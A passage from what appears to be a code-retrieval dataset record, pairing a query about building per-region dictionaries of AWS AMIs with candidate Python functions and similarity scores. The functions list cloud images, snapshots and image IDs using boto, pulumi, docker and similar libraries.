ids[offset:max(len(ids),limit)]\n else:\n ids = []\n\n print 'found ids: %s' % ids\n\n # return images for each ID\n images = map(self._get_from_redis,ids)\n\n # populate image data\n map(self._populate_image_data,images)\n\n return images", "def get_legacy_image_ids(self, content_retriever):\n pass", "def get_legacy_image_ids(self, content_retriever):\n pass", "def database_volume_snapshot_get_list():\n db = database_get()\n\n session = db.session()\n query = session.query(model.VolumeSnapshot)\n\n volume_snapshot_objs = list()\n for volume_snapshot in query.all():\n nfvi_volume_snapshot_data = \\\n json.loads(volume_snapshot.nfvi_volume_snapshot_data)\n nfvi_volume_snapshot = nfvi.objects.v1.VolumeSnapshot(\n nfvi_volume_snapshot_data['uuid'],\n nfvi_volume_snapshot_data['name'],\n nfvi_volume_snapshot_data['description'],\n nfvi_volume_snapshot_data['size_gb'],\n nfvi_volume_snapshot_data['volume_uuid'])\n volume_snapshot_obj = objects.VolumeSnapshot(nfvi_volume_snapshot)\n volume_snapshot_objs.append(volume_snapshot_obj)\n return volume_snapshot_objs", "def get_image_tags(self):\n current_images = self.images()\n tags = {tag: i['Id'] for i in current_images for tag in i['RepoTags']}\n return tags", "def history(self) -> List[SnapshotLogEntry]:\n return self.metadata.snapshot_log", "def imageList(self):\n return self.__imageList", "def dangling_pic_list(pic):\n if pic and not pic.person_set.count():\n ids.append(pic.key().id())", "def _list_snapshots(self):\n return self.resource.describe_snapshots(\n Filters=[\n {\n 'Name': 'tag:CreatedBy',\n 'Values': [\n 'AutomatedBackup{}'.format(INTERVAL_TYPE.capitalize())\n ]\n }\n ]\n )", "def search_image_id(self, image_path: str) -> str:\n try:\n with open(image_path, \"rb\") as f:\n content = f.read()\n if self._check_corrupted:\n nparr = np.frombuffer(content, np.uint8)\n img_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n if img_np is None:\n msg = \"Decode image {} failed\".format(image_path)\n raise ValueError(msg)\n except EnvironmentError as err:\n raise EnvironmentError(\"Load image {} failed\".format(image_path))\n\n hash_value = self._hash(content)\n\n hash_check = self._hash_to_id.get(hash_value, [])\n for image_id, path in hash_check:\n if filecmp.cmp(image_path, path):\n registered_id = image_id\n registered_path = path\n break\n else:\n registered_id = None\n registered_path = None\n\n return registered_id, registered_path, hash_value", "def get_snapshots(self):\r\n ec2 = self.get_ec2_connection()\r\n rs = ec2.get_all_snapshots()\r\n all_vols = [self.volume_id] + self.past_volume_ids\r\n snaps = []\r\n for snapshot in rs:\r\n if snapshot.volume_id in all_vols:\r\n if snapshot.progress == '100%':\r\n snapshot.date = dateutil.parser.parse(snapshot.start_time)\r\n snapshot.keep = True\r\n snaps.append(snapshot)\r\n snaps.sort(cmp=lambda x,y: cmp(x.date, y.date))\r\n return snaps", "def get_snapshot_ids(filters: Optional[Sequence[pulumi.InputType['GetSnapshotIdsFilterArgs']]] = None,\n owners: Optional[Sequence[str]] = None,\n restorable_by_user_ids: Optional[Sequence[str]] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSnapshotIdsResult:\n __args__ = dict()\n __args__['filters'] = filters\n __args__['owners'] = owners\n __args__['restorableByUserIds'] = restorable_by_user_ids\n opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)\n __ret__ = pulumi.runtime.invoke('aws:ebs/getSnapshotIds:getSnapshotIds', __args__, opts=opts, typ=GetSnapshotIdsResult).value\n\n return AwaitableGetSnapshotIdsResult(\n filters=pulumi.get(__ret__, 'filters'),\n id=pulumi.get(__ret__, 'id'),\n ids=pulumi.get(__ret__, 'ids'),\n owners=pulumi.get(__ret__, 'owners'),\n restorable_by_user_ids=pulumi.get(__ret__, 'restorable_by_user_ids'))", "def get_image_id(image):\n if not is_valid_image(image):\n return False\n\n return AVAILABLE_IMAGES[image]['imageid']", "def getTagsFromImages(metadataService, imageIds):\n \n types = [\"ome.model.annotations.TagAnnotation\"]\n annotations = metadataService.loadAnnotations(\"Image\", imageIds, types, None, None)\n \n tagsMap = {}\n for i in imageIds:\n annots = annotations[i]\n tags = [a.getTextValue().getValue() for a in annots]\n tagsMap[i] = tags\n return tagsMap", "def handle_api_list_images(self, http_context):\n\n command = self.docker + ['images', '--format', '\\'{{json .}}\\'', '--no-trunc', '-a']\n images = []\n for line in subprocess.check_output(command).decode().splitlines():\n image = json.loads(line)\n image['hash'] = image['ID'].split(':')[1][:12]\n images.append(image)\n return images", "def getIDs():", "def get_images(self):\r\n if self.images is None:\r\n self.images = {}\r\n for name, img_num in self.images.iteritems():\r\n if isinstance(img_num, int):\r\n yield (name, img_num)", "def get_ids(self) -> List[str]:", "def get_scan_ids(self):\n return list(self.scans.keys())", "def derived_snapshots(self):\n start_time = time.time()\n log.debug(\"Getting snaps derived from volume {0}.\".format(self.volume_id))\n derived_snapshots = []\n for snap in self.app.cloud_interface.get_all_snapshots():\n try:\n if snap.volume_id == self.volume_id:\n derived_snapshots.append(snap)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n log.debug(\"Got snaps derived from volume {0} in {1} seconds: {2}\"\n .format(self.volume_id, time.time() - start_time, derived_snapshots))\n return derived_snapshots", "def cmd_image_id(client, args):\n image = client.get_image(args.image_id)\n data = image.__dict__\n generate_output({'image': data})", "def list_images(bin_lid):\n bin_url = DATA_NAMESPACE + bin_lid + '.json'\n logging.info('listing images for %s' % bin_lid)\n ds = json.loads(urllib.urlopen(bin_url).read())\n for d in ds:\n yield d['imagename']", "def get_image_list(self, account):\n images = self.driver(account).list_images()\n return [image.name for image in images]", "def snapshots_created(self):\n # log.debug(\"Getting snaps created for volume {0}\".format(self.volume_id))\n snaps_info = []\n for snap in self._derived_snapshots:\n snap_info = {}\n try:\n if snap.volume_id == self.volume_id:\n snap.update()\n snap_info['snap_id'] = snap.id\n snap_info['snap_progress'] = snap.progress\n snap_info['snap_status'] = snap.status\n snap_info['snap_desc'] = snap.description\n snaps_info.append(snap_info)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n return snaps_info", "def get_snapshot_children(self, snapshot):\n LOG.debug('get_snapshot_children starts.')\n pool_name = self.configuration.rbd_pool\n volume_name = \\\n 'volume-%s' % encodeutils.safe_encode(snapshot[\"volume_id\"])\n snap_name = 'snapshot-%s' % encodeutils.safe_encode(snapshot['id'])\n children = list()\n children_on_snap = \\\n self._get_snapshot_children(pool_name, volume_name, snap_name)\n if children_on_snap is not None:\n for child in children_on_snap:\n item = dict()\n if len(child) == 2:\n item[\"pool_name\"] = child[0]\n item[\"volume_name\"] = child[1]\n if child[1].startswith(\"volume-\"):\n item[\"type\"] = \"volume\"\n item[\"uuid\"] = child[1][len(\"volume-\"):]\n elif uuidutils.is_uuid_like(child[1]):\n item[\"type\"] = \"volume\"\n item[\"uuid\"] = child[1]\n else:\n item[\"type\"] = \"\"\n item[\"uuid\"] = \"\"\n children.append(item)\n\n LOG.debug('snapshot children: %s', children)\n LOG.debug('get_snapshot_children finished.')\n return children", "def snapshots(self, owner=None, restorable_by=None):\r\n rs = self.connection.get_all_snapshots(owner=owner,\r\n restorable_by=restorable_by)\r\n mine = []\r\n for snap in rs:\r\n if snap.volume_id == self.id:\r\n mine.append(snap)\r\n return mine", "def history(self) -> List[Dict[str, Any]]:\n\n response = self.client.get(f\"/images/{self.id}/history\")\n body = response.json()\n\n if response.status_code == 200:\n return body\n\n if response.status_code == 404:\n raise ImageNotFound(body[\"cause\"], response=response, explanation=body[\"message\"])\n raise APIError(body[\"cause\"], response=response, explanation=body[\"message\"])", "def items(self):\n if self.__has_contents:\n return [dict(zip(['id', 'description', 'size', 'start_time', 'state'],\n [item['SnapshotId'], item['Description'], item['VolumeSize'],\n item['StartTime'], item['State']]))\n for item in self.__response['Snapshots']]\n else:\n return []", "def _read_image_ids(image_ids_path):\n return list(map(str.strip, open(image_ids_path, \"r\").readlines()))", "def _from_snapshot_request(pre_image, image):\n if pre_image.status == 'queued' and len(image.locations) == 1:\n loc_meta = image.locations[0]['metadata']\n return loc_meta and loc_meta.get('image_from', None) in ['snapshot',\n 'volume']", "def get_snapshots(self) -> SnapshotListing:\n return self.snapshots", "def get_images_list(self):\n return self.image_filenames_list", "def get_image_ids(task):\n run_ids = [\n i for i, code in enumerate(BOLD_NAMES, 1) if task.upper() in code\n ]\n if not run_ids:\n raise ValueError(f\"Found no data for '{task}''\")\n return run_ids", "def get_snapshot_ids_output(filters: Optional[pulumi.Input[Optional[Sequence[pulumi.InputType['GetSnapshotIdsFilterArgs']]]]] = None,\n owners: Optional[pulumi.Input[Optional[Sequence[str]]]] = None,\n restorable_by_user_ids: Optional[pulumi.Input[Optional[Sequence[str]]]] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetSnapshotIdsResult]:\n ...", "def get_image_information(client):\n\n pipeline = [{\"$match\": {\"camera_views\": {\"$exists\": 1}}}, {\"$unwind\": {\"path\": \"$camera_views\"}}, {\"$addFields\": {\n \"camera_views.average_linear_distance\": {\n \"$divide\": [\n \"$camera_views.total_linear_distance\",\n \"$camera_views.num_entities\"\n ]\n },\n \"camera_views.average_angular_distance\": {\n \"$divide\": [\n \"$camera_views.total_angular_distance\",\n \"$camera_views.num_entities\"\n ]\n },\n \"camera_views.timestamp\": \"$timestamp\",\n \"camera_views._id\": \"$_id\",\n \"camera_views.database\": client.database.name,\n \"camera_views.collection\": client.name,\n 'camera_views.file_id':\"$camera_views.images.file_id\", #Add the Color image id for downloading and testing\n }}, {\"$replaceRoot\": {\"newRoot\": \"$camera_views\"}}, {\"$project\": {\n \"_id\": 1,\n \"num_entities\": 1,\n \"average_linear_distance\": 1,\n \"average_angular_distance\": 1,\n \"timestamp\": 1,\n \"duplicate\": 1,\n \"database\":1,\n \"collection\":1,\n \"file_id\":{\"$arrayElemAt\":[\"$images.file_id\",0]}, # Only keep the first file id (The Color image)\n }}]\n pprint.pprint(pipeline)\n result = list(client.aggregate(pipeline))\n return result", "def list_snapshots(project):\n data = {constants.PROJECT_PARAMETER: project}\n res = requests.post(_url + \"list_snapshots/\", data=data,\n auth=(_username, _password))\n if res.status_code == 200:\n snapshots = json.loads(res.content)\n table = PrettyTable(field_names=[\"Snapshot\", \"Parent\"])\n for snapshot in snapshots:\n table.add_row(snapshot)\n click.echo(table.get_string())\n else:\n click.echo(res.content)", "def annotation_history(request, image_id):\n\n image = get_object_or_404(Image, id=image_id)\n source = image.source\n\n # Use values_list() and list() to avoid nested queries.\n # https://docs.djangoproject.com/en/1.3/ref/models/querysets/#in\n annotation_values = Annotation.objects.filter(image=image, source=source).values('pk', 'point__point_number')\n annotation_ids = [v['pk'] for v in annotation_values]\n\n # Prefetch versions from the DB.\n versions_queryset = Version.objects.filter(object_id__in=list(annotation_ids))\n versions = list(versions_queryset) # list() prefetches.\n\n # label_pks_to_codes maps Label pks to the corresponding Label's short code.\n label_pks = set([v.field_dict['label'] for v in versions])\n labels = Label.objects.filter(pk__in=label_pks).values_list('pk', 'code')\n label_pks_to_codes = dict(labels)\n for pk in label_pks:\n if pk not in label_pks_to_codes:\n label_pks_to_codes[pk] = \"(Deleted label)\"\n\n revision_pks = versions_queryset.values_list('revision', flat=True).distinct()\n revisions = list(Revision.objects.filter(pk__in=list(revision_pks)))\n\n # anno_pks_to_pointnums maps each Annotation's pk to the corresponding\n # Point's point number.\n point_number_tuples = [(v['pk'], v['point__point_number']) for v in annotation_values]\n anno_pks_to_pointnums = dict()\n for tup in point_number_tuples:\n anno_pks_to_pointnums[tup[0]] = tup[1]\n\n event_log = []\n\n for rev in revisions:\n # Get Versions under this Revision\n rev_versions = list(versions_queryset.filter(revision=rev))\n # Sort by the point number of the annotation\n rev_versions.sort( key=lambda x: anno_pks_to_pointnums[int(x.object_id)] )\n\n # Create a log entry for this Revision\n events = [\"Point {num}: {code}\".format(\n num=anno_pks_to_pointnums[int(v.object_id)],\n code=label_pks_to_codes[v.field_dict['label']],\n )\n for v in rev_versions\n ]\n if rev.comment:\n events.append(rev.comment)\n event_log.append(\n dict(\n date=rev.date_created,\n user=get_annotation_version_user_display(rev_versions[0]), # Any Version will do\n events=events,\n )\n )\n\n for access in AnnotationToolAccess.objects.filter(image=image, source=source):\n # Create a log entry for each annotation tool access\n event_str = \"Accessed annotation tool\"\n event_log.append(\n dict(\n date=access.access_date,\n user=access.user.username,\n events=[event_str],\n )\n )\n\n event_log.sort(key=lambda x: x['date'], reverse=True)\n\n return render_to_response('annotations/annotation_history.html', {\n 'source': source,\n 'image': image,\n 'metadata': image.metadata,\n 'event_log': event_log,\n },\n context_instance=RequestContext(request)\n )", "def get_volume_snapshots(self, volume):\n LOG.debug('get_volume_snapshot starts')\n pool_name = self.configuration.rbd_pool\n volume_name = 'volume-%s' % encodeutils.safe_encode(volume[\"id\"])\n snaps_on_vol = self._get_volume_snapshots(pool_name, volume_name)\n snapshots = list()\n if snaps_on_vol is not None:\n for snap in snaps_on_vol:\n snap_name = str(snap[\"name\"])\n item = dict()\n if snap_name.startswith(\"snapshot-\"):\n # snapshot directly created on volume.\n item[\"type\"] = \"volume_snap\"\n item[\"uuid\"] = snap_name[len('snapshot-'):]\n elif snap_name.startswith(\"volume-\") and \\\n snap_name.endswith(\".clone_snap\"):\n # snapshot used for create volume on volume.\n item[\"type\"] = \"clone_snap\"\n item[\"uuid\"] = snap_name[len(\"volume-\"):-len(\".clone_snap\")]\n elif snap_name.startswith(\"backup.\") and \".snap.\" in snap_name:\n # snapshot used for backup volume.\n item[\"type\"] = \"backup_snap\"\n item[\"uuid\"] = \\\n snap_name[len(\"backup.\"):snap_name.index(\".snap.\")]\n else:\n item[\"type\"] = \"\"\n item[\"uuid\"] = \"\"\n snapshots.append(item)\n\n LOG.debug('volume snapshots: %s', snapshots)\n LOG.debug('get_volume_snapshots finished.')\n return snapshots", "def list_details(ec2, image_id): # pragma: no coverage\n image = ec2.Image(image_id)\n\n def _filter_attrs(obj):\n if isinstance(obj, property) or isinstance(obj, (str, list)):\n return True\n\n for key, value in inspect.getmembers(image, predicate=_filter_attrs):\n if key.startswith(\"_\"):\n continue\n else:\n printy(key + \":\")\n pprint(value)", "def get_exploration_snapshots_metadata(exploration_id, limit):\n exploration = get_exploration_by_id(exploration_id)\n oldest_version = max(exploration.version - limit, 0) + 1\n current_version = exploration.version\n version_nums = range(current_version, oldest_version - 1, -1)\n\n return [exp_models.ExplorationSnapshotModel.get_metadata(\n exploration_id, version_num\n ) for version_num in version_nums]", "def list(self):\n r = self.target.ttbd_iface_call(\"images\", \"list\", method = \"GET\")\n return r['result']", "def get_existing_dhashes(self, img_dir):\r\n dhashes = []\r\n for img_path in Path(img_dir).glob(\"*.png\"):\r\n img = cv2.imread(str(img_path))\r\n hash = dhash.dhash_int(Image.fromarray(img), HASH_SIZE)\r\n dhashes.append(hash)\r\n\r\n return dhashes", "def filter_images(data, vgid2idx, meta_vgids):\r\n new_data = []\r\n for vgid in meta_vgids:\r\n new_data.append(data[vgid2idx[vgid]])\r\n return new_data", "def get_image_set_for_uid(uid: str):\n images = get_all_image_structs(uid, Config.study_size, is_accumulating=False)\n res = {'images': images}\n return res", "def _get_instance_ids(instances):\n instance_ids = []\n for instance in instances:\n instance_ids.append(instance.id)\n return instance_ids", "def snapshot_id(self) -> Optional[str]:\n return pulumi.get(self, \"snapshot_id\")", "def snapshot_id(self) -> Optional[str]:\n return pulumi.get(self, \"snapshot_id\")", "def get_ami_by_id(self, image_id):\n images = self._driver.list_images(ex_owner=self.account_id)\n image = [i for i in images if i.id == image_id][0]\n return image", "def get_image_ids(self):\n train_ids = os.listdir(self.tr_img_dir)\n test_ids = os.listdir(self.te_img_dir)\n\n ids = {\n 'train':train_ids,\n 'test':test_ids\n }\n\n return ids", "def get_snapshots(dataset=''):\n # filter my tags\n return os.listdir(dataset + ZFS_DEFAULT_SNAPSHOT_DIR)", "def get_images(self):\n \n return self.img_lst", "def get_mapping_actions(image=None, imageId=None, in_digests=[], bundle={}):\n\n if not image or not bundle:\n raise Exception(\"input error\")\n\n if not verify_policy_bundle(bundle=bundle):\n raise Exception(\"input bundle does not conform to bundle schema\")\n\n ret = []\n \n image_infos = []\n\n image_info = anchore_utils.get_all_image_info(image)\n if image_info and image_info not in image_infos:\n image_infos.append(image_info)\n\n for m in bundle['mappings']:\n polname = m['policy_id']\n wlnames = m['whitelist_ids']\n\n for image_info in image_infos:\n #_logger.info(\"IMAGE INFO: \" + str(image_info))\n ii = {}\n ii.update(image_info)\n registry = ii.pop('registry', \"N/A\")\n repo = ii.pop('repo', \"N/A\")\n\n tags = []\n fulltag = ii.pop('fulltag', \"N/A\")\n if fulltag != 'N/A':\n tinfo = anchore_utils.parse_dockerimage_string(fulltag)\n if 'tag' in tinfo and tinfo['tag']:\n tag = tinfo['tag']\n\n for t in [image, fulltag]:\n tinfo = anchore_utils.parse_dockerimage_string(t)\n if 'tag' in tinfo and tinfo['tag'] and tinfo['tag'] not in tags:\n tags.append(tinfo['tag'])\n\n digest = ii.pop('digest', \"N/A\")\n digests = [digest]\n for d in image_info['digests']:\n dinfo = anchore_utils.parse_dockerimage_string(d)\n if 'digest' in dinfo and dinfo['digest']:\n digests.append(dinfo['digest'])\n \n p_ids = []\n p_names = []\n for p in bundle['policies']:\n p_ids.append(p['id'])\n p_names.append(p['name'])\n\n wl_ids = []\n wl_names = []\n for wl in bundle['whitelists']:\n wl_ids.append(wl['id'])\n wl_names.append(wl['name'])\n \n if polname not in p_ids:\n _logger.info(\"policy not in bundle: \" + str(polname))\n continue\n\n skip=False\n for wlname in wlnames:\n if wlname not in wl_ids:\n _logger.info(\"whitelist not in bundle\" + str(wlname))\n skip=True\n if skip:\n continue\n\n mname = m['name']\n mregistry = m['registry']\n mrepo = m['repository']\n if m['image']['type'] == 'tag':\n mtag = m['image']['value']\n mdigest = None\n mimageId = None\n elif m['image']['type'] == 'digest':\n mdigest = m['image']['value']\n mtag = None\n mimageId = None\n elif m['image']['type'] == 'id':\n mimageId = m['image']['value']\n mtag = None\n mdigest = None\n else:\n mtag = mdigest = mimageId = None\n\n if registry == mregistry or mregistry == '*':\n _logger.debug(\"checking mapping for image (\"+str(image_info)+\") match.\")\n\n if repo == mrepo or mrepo == '*':\n doit = False\n matchstring = mname + \": N/A\"\n if tag and (mtag == '*' or mtag == tag or mtag in tags):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mtag])\n doit = True\n elif digest and (mdigest == digest or mdigest in in_digests or mdigest in digests):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mdigest])\n doit = True\n elif imageId and (mimageId == imageId):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mimageId])\n doit = True\n\n matchstring = matchstring.encode('utf8')\n if doit:\n _logger.debug(\"match found for image (\"+str(matchstring)+\")\")\n\n wldata = []\n wldataset = set()\n for wlname in wlnames:\n wldataset = set(list(wldataset) + extract_whitelist_data(bundle, wlname))\n wldata = list(wldataset)\n\n poldata = extract_policy_data(bundle, polname)\n \n wlnames.sort()\n evalstr = ','.join([polname] + wlnames)\n evalhash = hashlib.md5(evalstr).hexdigest()\n ret.append( ( poldata, wldata, polname,wlnames, matchstring, m, evalhash) )\n return(ret)\n else:\n _logger.debug(\"no match found for image (\"+str(image_info)+\") match.\")\n else:\n _logger.debug(\"no match found for image (\"+str(image_info)+\") match.\")\n\n return(ret)", "def getEventIds(self):\n eventIdsLst = []\n for event in self.eventsLst:\n eventIdsLst.append(event['id'])\n return eventIdsLst", "def ListSnapshots(self):\n file_names = sorted(\n [name[:-(len(Archive._SNAP_EXT))] for name in os.listdir(self._path)\n if name.endswith(Archive._SNAP_EXT)])\n timestamps = [datetime.datetime.strptime(x, Archive._TIME_FMT)\n for x in file_names]\n return timestamps", "def GetVMSnapshotsList(self):\n try:\n current = self.vmInstance.get_current_snapshot_name()\n snapshots = self.vmInstance.get_snapshots()\n\n if current and snapshots:\n LOGGER.info('Name of current snapshot of virtual machine \"{}\": \"{}\"'.format(VM_NAME, current))\n LOGGER.info('List of all snapshots:')\n\n for i, snap in enumerate(snapshots):\n LOGGER.info(' {}. \"'.format(i + 1) + snap.get_name() + '\"')\n\n else:\n LOGGER.warning('No snapshots found for virtual machine \"{}\"!'.format(VM_NAME))\n\n except Exception as e:\n snapshots = None\n LOGGER.debug(e)\n LOGGER.error(traceback.format_exc())\n LOGGER.error('An error occured while getting list of snapshots of virtual machine \"{}\"!'.format(VM_NAME))\n\n return snapshots", "def img_filenames(self, matricule):\n proj, sid = next((proj, proj.Matricule(matricule).to('AmcStudentId'))\n for proj in self.projects_by_serie.values()\n if proj.Matricule(matricule).exists('AmcStudentId'))\n return [\n (int(num), filename.replace('%PROJET', proj.path))\n for num, filename in proj.dbs['capture'].execute('select page, src from capture_page where student=? order by page', [sid])\n ]", "def list(self, detailed=True, search_opts=None):\n query_string = utils.build_query_param(search_opts, sort=True)\n\n detail = \"\"\n if detailed:\n detail = \"/detail\"\n\n return self._list(\"/group_snapshots%s%s\" % (detail, query_string),\n \"group_snapshots\")", "def object_ids(self):\n return self._extract_set('id')", "def filter_images(history, whitelist):\n docker_client = docker.client.APIClient()\n local_images = common.get_local_images(docker_client)\n approved_images = set(local_images) - set(whitelist)\n return {image: timestamp for image, timestamp in history.items() if image in approved_images}", "def list_snapshots(self, detail=False, **params):\n url = 'snapshots'\n list_schema = schema.list_snapshots_no_detail\n if detail:\n url += '/detail'\n list_schema = schema.list_snapshots_with_detail\n if params:\n url += '?%s' % urllib.urlencode(params)\n\n resp, body = self.get(url)\n body = json.loads(body)\n self.validate_response(list_schema, resp, body)\n return rest_client.ResponseBody(resp, body)", "def row_uuids(self) -> list:\n return self.__row_uuids", "def _get_ids_from_ip(self, ip_address):\r\n try:\r\n # Does it look like an ip address?\r\n socket.inet_aton(ip_address)\r\n except socket.error:\r\n return []\r\n\r\n # Find the VS via ip address. First try public ip, then private\r\n results = self.list_instances(public_ip=ip_address, mask=\"id\")\r\n if results:\r\n return [result['id'] for result in results]\r\n\r\n results = self.list_instances(private_ip=ip_address, mask=\"id\")\r\n if results:\r\n return [result['id'] for result in results]", "def list_snapshots(session, verbose):\n # type: (Session, bool) -> Union[List[str], List[Dict[str,str]]]\n if not session.network:\n raise ValueError(\"Network must be set to list snapshots\")\n url_tail = \"/{}/{}/{}\".format(\n CoordConstsV2.RSC_NETWORKS, session.network, CoordConstsV2.RSC_SNAPSHOTS\n )\n return _get_list(session, url_tail, {CoordConstsV2.QP_VERBOSE: verbose})", "def snapshot_metadata(self):\n return self._snapshot_metadata", "def get_snapshots(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_snapshots = conn.get_all_snapshots(owner='self')\n except boto.exception.EC2ResponseError:\n return []\n return region_snapshots", "def orthologueGeneIds(self):\n\t\tgeneIds = []\n\t\tfor geneId,row in self._dataframe.iterrows():\n\t\t\tfor item in row['Orthologue'].split(','):\t# looks like 'ENSG00003435:Gene1,ENSG00002525:Gene2' (multiple orthologues possible)\n\t\t\t\tif item.split(':')[0]: geneIds.append(item.split(':')[0])\n\t\treturn list(set(geneIds))", "def filter_images(data, split_data):\n all_split_ids = set()\n for split_name, ids in split_data.iteritems():\n all_split_ids.update(ids)\n new_data = []\n for img in data:\n keep = img['id'] in all_split_ids and len(img['regions']) > 0\n if keep:\n new_data.append(img)\n return new_data", "def servicemanage_snapshot_glance_metadata_get(context, snapshot_id, session=None):\n if not session:\n session = get_session()\n\n return session.query(models.ServiceManageGlanceMetadata).\\\n filter_by(snapshot_id=snapshot_id).\\\n filter_by(deleted=False).all()", "def image_versions(self, image_name):\n # TODO: Expand to read all tags locally, not just a fixed list\n try:\n return {\"latest\": self.image_version(image_name, \"latest\")}\n except ImageNotFoundException:\n return {}", "def screenshots(self):\n return self._screenshots", "def get_tags(self):\n tags = []\n for image in self.client.images.list():\n for tag in image.tags:\n if tag.startswith(self.repository_name):\n tokens = tag.split(':')\n tags.append(tokens[1])\n return tags", "def describe_snapshots(DirectoryId=None, SnapshotIds=None, NextToken=None, Limit=None):\n pass", "def list_snapshots(self, detailed=True):\n aname = \"cinder_v%s.list_snapshots\" % self.version\n with atomic.ActionTimer(self, aname):\n return (self._get_client()\n .volume_snapshots.list(detailed))", "def list_images(self):\n raise NotImplementedError()", "def list_images():\n return json_response(list_manifests())", "def get_split_vids(split_vids_path, image_set, subset='default') -> list:\n assert image_set in [\"train\", \"test\", \"val\", \"all\"]\n vid_ids = []\n sets = [image_set] if image_set != 'all' else ['train', 'test', 'val']\n for s in sets:\n vid_id_file = os.path.join(split_vids_path, subset, s + '.txt')\n with open(vid_id_file, 'rt') as fid:\n vid_ids.extend([x.strip() for x in fid.readlines()])\n\n return vid_ids" ]
[ "0.82660115", "0.6894388", "0.6246945", "0.6215981", "0.61946225", "0.60906774", "0.6078066", "0.607749", "0.5850587", "0.5829291", "0.5715038", "0.57149994", "0.5700483", "0.56884575", "0.5666648", "0.5638562", "0.56358933", "0.56192404", "0.55592096", "0.55305934", "0.5525555", "0.5520752", "0.5501659", "0.54880667", "0.5413136", "0.5403517", "0.5403517", "0.53875864", "0.5386721", "0.5364545", "0.53632647", "0.53231484", "0.5304247", "0.5293768", "0.5292942", "0.5284842", "0.5246237", "0.5243904", "0.5239223", "0.5232864", "0.52173805", "0.5216274", "0.5192146", "0.51866645", "0.51705617", "0.5170476", "0.5168298", "0.5148204", "0.5143007", "0.5122101", "0.5120914", "0.5091899", "0.5090733", "0.5085515", "0.50799763", "0.5065843", "0.50632685", "0.50427324", "0.5033", "0.5032686", "0.50302464", "0.5026262", "0.5016192", "0.5006725", "0.5005228", "0.5003699", "0.4997975", "0.49971867", "0.49952456", "0.49932796", "0.49932796", "0.49907517", "0.49879366", "0.49832353", "0.49830252", "0.49780902", "0.49734604", "0.49629018", "0.496235", "0.49572268", "0.49428836", "0.49428523", "0.49305743", "0.49292454", "0.49171397", "0.49160346", "0.49089113", "0.49087656", "0.49079278", "0.49052817", "0.49028492", "0.4902303", "0.48976517", "0.4889331", "0.48807764", "0.48785833", "0.4874758", "0.48742864", "0.48704788", "0.48686373" ]
0.8464934
0
Use dictionaries 'cos we'll have to crossreference to get snapshots that go with the AMIs returns list of dictionaries representing images from one region
def getImagesD(region): images = getImages(region) imageDicts = [] for im in images: imageDict = {"name": im.name, "id": im.id, "region": im.region.name, "state": im.state, "created": im.creationDate, "type": im.type, "KEEP": getKeepTag(im), "name_tag": get_name_tag(im), "snapshots": getSnapshotsOf(im), "description": im.description, "PROD": isProduction(im) } imageDicts.append(imageDict) return imageDicts
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getSnapshotsD(region):\n # Can a snapshot belong to more than one AMI? Dunno, keep list just in case (so it never breaks due to it)\n snapshots = getSnapshots(region)\n snapshotsDicts = []\n ims = getImages(region)\n for s in snapshots:\n amis = getAmisOf(s, ims)\n amiIds = []\n amiKeeps = []\n\n if len(amis) == 1:\n amiIds = amis[0].id.encode()\n amiKeeps = getKeepTag(amis[0])\n\n elif len(amis) == 0:\n amiIds = \"-------no-AMI-found\"\n amiKeeps = \"-------no-AMI-found\"\n else:\n for a in amis:\n amiIds.append(a.id.encode())\n amiKeeps.append(getKeepTag(a))\n\n snapshotsDict = {\"id\": s.id,\n \"status\": s.status,\n \"region\": s.region.name,\n \"progress\": s.progress,\n \"start_time\": s.start_time,\n \"volume_id\": s.volume_id,\n \"volume_size\": s.volume_size,\n \"KEEP-tag\": getKeepTag(s),\n \"Name\": get_name_tag(s),\n \"AMI(s)\": amiIds,\n \"AMI_KEEP-tags\": amiKeeps,\n \"PROD\": isProduction(s),\n \"Description\": s.description\n }\n snapshotsDicts.append(snapshotsDict)\n return snapshotsDicts", "def get_images():\n images = {}\n for k, v in DB.IMAGES.iteritems():\n images[k] = v.__dict__\n return images", "def images(self) -> dict:\n raise NotImplementedError", "def getimgs():", "def images_mapped(self):\n try:\n return dict([x for x in enumerate(self.images())])\n except:\n return None", "def populate_images(self):\n print \"Populating images info...\"\n images = self.get_all_images()\n for i in images:\n\n associated_snapshots = self.get_snapshots_of(i)\n\n self.spreadsheet[i.id] = dict(name=i.name, Name_tag=self.get_name_tag(i), id=i.id,\n KEEP_tag=self.get_keep_tag(i), PROD_tag=self.is_production(i),\n region=i.region.name,\n created=i.creationDate,\n associated_snapshots=associated_snapshots,\n description=i.description)", "def get_snapshots_of(image):\n snapshot_ids = []\n device_mapping = image.block_device_mapping # dict of devices\n devices = device_mapping.keys()\n for device in devices:\n if device_mapping[device].snapshot_id is not None:\n snapshot_ids.append(device_mapping[device].snapshot_id.encode()) # do I need to have 'encode' here?\n return snapshot_ids", "def getAmisOf(snapshot, images):\n amis = []\n for im in images:\n snapshotsOfThisIm = getSnapshotsOf(im)\n for soti in snapshotsOfThisIm:\n if soti == snapshot.id:\n amis.append(im)\n return amis", "def avail_images(call=None):\n if call == \"action\":\n raise SaltCloudSystemExit(\n \"The avail_images function must be called with \"\n \"-f or --function, or with the --list-images option\"\n )\n\n ret = {}\n conn = get_conn()\n\n for item in conn.list_images()[\"items\"]:\n image = {\"id\": item[\"id\"]}\n image.update(item[\"properties\"])\n ret[image[\"name\"]] = image\n\n return ret", "def handle_api_list_images(self, http_context):\n\n command = self.docker + ['images', '--format', '\\'{{json .}}\\'', '--no-trunc', '-a']\n images = []\n for line in subprocess.check_output(command).decode().splitlines():\n image = json.loads(line)\n image['hash'] = image['ID'].split(':')[1][:12]\n images.append(image)\n return images", "def list_images(self):\n \n logging.debug(\"list_images entered for %s\" % self.machine_name) \n snapshots = 